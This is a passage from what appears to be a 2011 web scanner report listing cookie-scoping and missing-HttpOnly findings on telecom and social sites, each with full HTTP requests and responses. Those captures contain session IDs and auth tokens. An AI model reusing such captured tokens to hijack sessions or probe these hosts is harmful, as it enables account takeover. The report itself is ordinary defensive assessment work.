User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:46:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E596F005010A07-4000010D201AEE12[CE]; Expires=Tue, 10 May 2016 00:46:24 GMT; Domain=.sprint.com; Path=/
Location: http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&pccr=true&vidn=26E596F005010A07-4000010D201AEE12&&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:46:24 GMT
Last-Modified: Fri, 13 May 2011 00:46:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www105
Content-Length: 0
Content-Type: text/plain


12.7. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139?AQB=1&ndh=1&t=11/4/2011%2019%3A50%3A39%203%20300&ns=vonage&pageName=lp_US_afflpdc_index&g=http%3A//www.vonage.com/lp/US/afflpdc/index.php&r=http%3A//www.vonage-forum.com/forum8.html&cc=USD&ch=US/VDV/Vonagecom&events=event7&h1=US/VDV/Vonagecom&c11=MainSite&v14=http%3A//www.vonage-forum.com/forum8.html&v15=www.vonage-forum.com&v18=Other%20Referrers-www.vonage-forum.com&v19=n/a&v20=Other%20Referrers&v23=Other%20Referrers-www.vonage-forum.com&v44=lp_US_afflpdc_index&c45=3&c46=8%3A30PM&v46=8%3A30PM&c47=Wednesday&v47=Wednesday&c48=Weekday&v48=Weekday&c49=New&v49=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/lp/US/afflpdc/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer_id=AFLGN090801001W1; LP=1%7E%7E; op471landingpagegum=a03o0bv0lg275ci0432m078ca; op471landingpageliid=a03o0bv0lg275ci0432m078ca; s_cc=true; s_nr=1305161439053-New; gpv_pageName=lp_US_afflpdc_index; s_cm=undefinedwww.vonage-forum.comwww.vonage-forum.com; s_cpmcvp=%5B%5B%27Other%2520Referrers-www.vonage-forum.com%27%2C%271305161439058%27%5D%5D

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:50:40 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E5977005079CA6-60000102A0076E90[CE]; Expires=Tue, 10 May 2016 00:50:40 GMT; Domain=.vonage.com; Path=/
Location: http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139?AQB=1&pccr=true&vidn=26E5977005079CA6-60000102A0076E90&&ndh=1&t=11/4/2011%2019%3A50%3A39%203%20300&ns=vonage&pageName=lp_US_afflpdc_index&g=http%3A//www.vonage.com/lp/US/afflpdc/index.php&r=http%3A//www.vonage-forum.com/forum8.html&cc=USD&ch=US/VDV/Vonagecom&events=event7&h1=US/VDV/Vonagecom&c11=MainSite&v14=http%3A//www.vonage-forum.com/forum8.html&v15=www.vonage-forum.com&v18=Other%20Referrers-www.vonage-forum.com&v19=n/a&v20=Other%20Referrers&v23=Other%20Referrers-www.vonage-forum.com&v44=lp_US_afflpdc_index&c45=3&c46=8%3A30PM&v46=8%3A30PM&c47=Wednesday&v47=Wednesday&c48=Weekday&v48=Weekday&c49=New&v49=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 00:50:40 GMT
Last-Modified: Fri, 13 May 2011 00:50:40 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www21
Content-Length: 0
Content-Type: text/plain


12.8. http://nextelonline.nextel.com/tl/set_tl.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nextelonline.nextel.com
Path:   /tl/set_tl.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tl/set_tl.html?34CE0D747C31107C188BD6527E05D4BF HTTP/1.1
Host: nextelonline.nextel.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 00:46:16 GMT
Content-type: text/html
Set-Cookie: TLTSID=3E4B9B467C31107C1E2DA15A0F0D7966; Path=/; Domain=.nextel.com
Content-Length: 1439

<script>
   var cn="TLTSID"; // the cookie name
   var flag="TLisset=true"; // name/value for the "flag" cookie
   // array of domains for different environments (production is last as a catchall)
   // each
...[SNIP]...

12.9. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=70613911;fpan=0;fpa=P0-487374334-1303349183888;ns=1;url=http%3A%2F%2Fmediacdn.disqus.com%2F1304984847%2Fbuild%2Fsystem%2Fdef.html%23xdm_e%3Dhttp%253A%252F%252Fconnectedplanetonline.com%26xdm_c%3Ddefault3812%26xdm_p%3D1%26;ref=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1305161240362;tzo=300;a=p-94WKwgUwZHlfo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://mediacdn.disqus.com/1304984847/build/system/def.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EL4AJe8kjVmM-5GL0ZmY8frRi58oyBABxQEB3AaBtQCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAL4tGmog0bEJ0pOUo4sjA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EN8AJe8kjVmM-5GL0ZmY8frRi58oyBABxQEB3QaB1QCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAL4tGmog0bEJ0pOUo4sjA; expires=Wed, 10-Aug-2011 00:48:44 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Thu, 12 May 2011 00:48:44 GMT
Server: QS


12.10. http://shop2.sprint.com/en/support/faq/wlnp.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop2.sprint.com
Path:   /en/support/faq/wlnp.shtml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/support/faq/wlnp.shtml HTTP/1.1
Host: shop2.sprint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 12 May 2011 00:46:00 GMT
Set-Cookie: TLTSID=34E27AE87C31107C188CD6527E05D4BF; Path=/; Domain=.sprint.com
Content-type: text/html
Content-Length: 324

<script type="text/javascript">location.replace('http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547');</script>


<meta http-equiv="refresh" c
...[SNIP]...

12.11. http://www.linkedin.com/companyInsider  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /companyInsider

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /companyInsider?script&useBorder=no HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; __qca=P0-87169230-1303163602430; bcookie="v=1&4d9675db-dcd4-4b34-bfd9-5f98cf2c89da"; __utmz=23068709.1304721517.5.2.utmcsr=socialfollow.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=23068709.2028061763.1303163602.1304000549.1304721517.5; __utmv=23068709.guest

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:8tR8AXa_H87sybQCohL0f5rN4fe7m5AJEEzQz9agYlq3KAZCF6aP-d:1305161207:bd31acd81eafdc11524936bd768546496be4bb6b"; Version=1; Max-Age=1799; Expires=Thu, 12-May-2011 01:16:46 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:8157137445058115307"; Version=1; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 00:46:46 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19964145525d5f4f58455e445a4a42198c;expires=Thu, 12-May-2011 01:18:01 GMT;path=/;httponly
Content-Length: 12412

(function() {

// Set up LinkedIn Global Namespace
if (typeof(LinkedIn) == 'undefined') {
LinkedIn = {};
}

// Utility functions
function $(element) {
return (typeof element == 'string') ?

...[SNIP]...

12.12. http://www.vonage.com/lp/US/afflpdc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /lp/US/afflpdc/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lp/US/afflpdc/?refer_id=AFLGN090801001W1&promo_id=USVONRP2499NSC_WEB&deviceType=VDV21_FREE_UPSELL HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 00:50:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: refer_id=AFLGN090801001W1; expires=Fri, 27-May-2011 00:50:29 GMT; path=/; domain=.vonage.com
Location: http://www.vonage.com/lp/US/afflpdc/index.php
Set-Cookie: LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com
Content-Type: text/html
Content-Length: 18264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

12.13. http://www.vonage.com/lp/US/afflpdc/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /lp/US/afflpdc/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/US/afflpdc/index.php HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer_id=AFLGN090801001W1; LP=1%7E%7E

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com
Content-Type: text/html
Content-Length: 17336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

13. Cookie without HttpOnly flag set  previous  next
There are 100 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



13.1. https://catalyst.fastcatalog.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://catalyst.fastcatalog.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: catalyst.fastcatalog.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.catalysttelecom.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AD971C52BCD76B2912D285BABD89388E; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:11:13 GMT
Connection: Keep-Alive
Content-Length: 6220


   <!-- -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type"
...[SNIP]...

13.2. https://lnp.activationnow.com/lnp/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://lnp.activationnow.com
Path:   /lnp/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lnp/ HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: LNP=pabetaptel16p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-cache="set-cookie"
Date: Thu, 12 May 2011 00:50:19 GMT
Location: https://lnp.activationnow.com/lnp/jsp/logon/login.jsp;jsessionid=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395
Set-Cookie: JSESSIONID=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 457

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://lnp.activationnow.com/lnp/j
...[SNIP]...

13.3. http://s.clickability.com/s  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://s.clickability.com
Path:   /s

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /s?&7=97671&8=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&10=Purchase%20from%20Evolving%20Systems%20will%20broaden%20Neustar%20numbering%20solutions%20business&19=900&21=1&18=0.7688524462282658 HTTP/1.1
Host: s.clickability.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=XSJJRwvp9uaycevK8bvSuzwT7PRE9+yX3HsherrzsbM=; ld=ssLQg212k+H3LqCSE0WF9IN1yHvGRQbEMl0oM8dwNE28YQc4QkM99WsCe+kR6r8AP4IQvvNXwSiIuki12HGMINSZF7h9+Dh4k1ZYz3qgr275RnUUHfhZGJr5QX4YXSlZ6KDpwnwzGoY=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:47 GMT
Server: Apache
P3P: policyref="http://www.clickability.com/w3c/p3p.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 42
X-Server-Name: dv-c1-r1-u14-b11
Connection: close
Content-Type: image/gif
Set-Cookie: Stats_Session=591922186.20480.0000; path=/

GIF89a.............!.......,........@..D.;

13.4. https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/911_logo_trc.jpg.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/911_logo_trc.jpg.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=E67566A9FCA34838BD3C0F39C7667AF5; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"23480-1288968421251"
Last-Modified: Fri, 05 Nov 2010 14:47:01 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 23480

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

13.5. https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/Custom_HeadLogo.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/Custom_HeadLogo.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=278E65F15DE692F4A8E073513FF95433; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"4671-1288970193688"
Last-Modified: Fri, 05 Nov 2010 15:16:33 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 4671

.PNG
.
...IHDR..............h.s...    pHYs..........+....
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

13.6. https://support.connexon.com/custom/customimages/portal-browse-solutions.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/portal-browse-solutions.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/portal-browse-solutions.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=8B4C97B2401F7908250BAE174F9BBA38; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"1990-1280994282000"
Last-Modified: Thu, 05 Aug 2010 07:44:42 GMT
Content-Type: image/gif
Content-Length: 1990
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1

GIF89a0.0....J..3i.w..,}.*j."[{......$VxN...Lky..c.....\..Z..*y....=r....V..2..i..Y..o..5........f..,..&i.......7..l..Q..3..:........$a.S..S........{..g..5..m........[..{........`.....9..4..e..*.."TsA
...[SNIP]...

13.7. https://support.connexon.com/custom/customimages/portal-browse-ticket.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/portal-browse-ticket.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/portal-browse-ticket.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
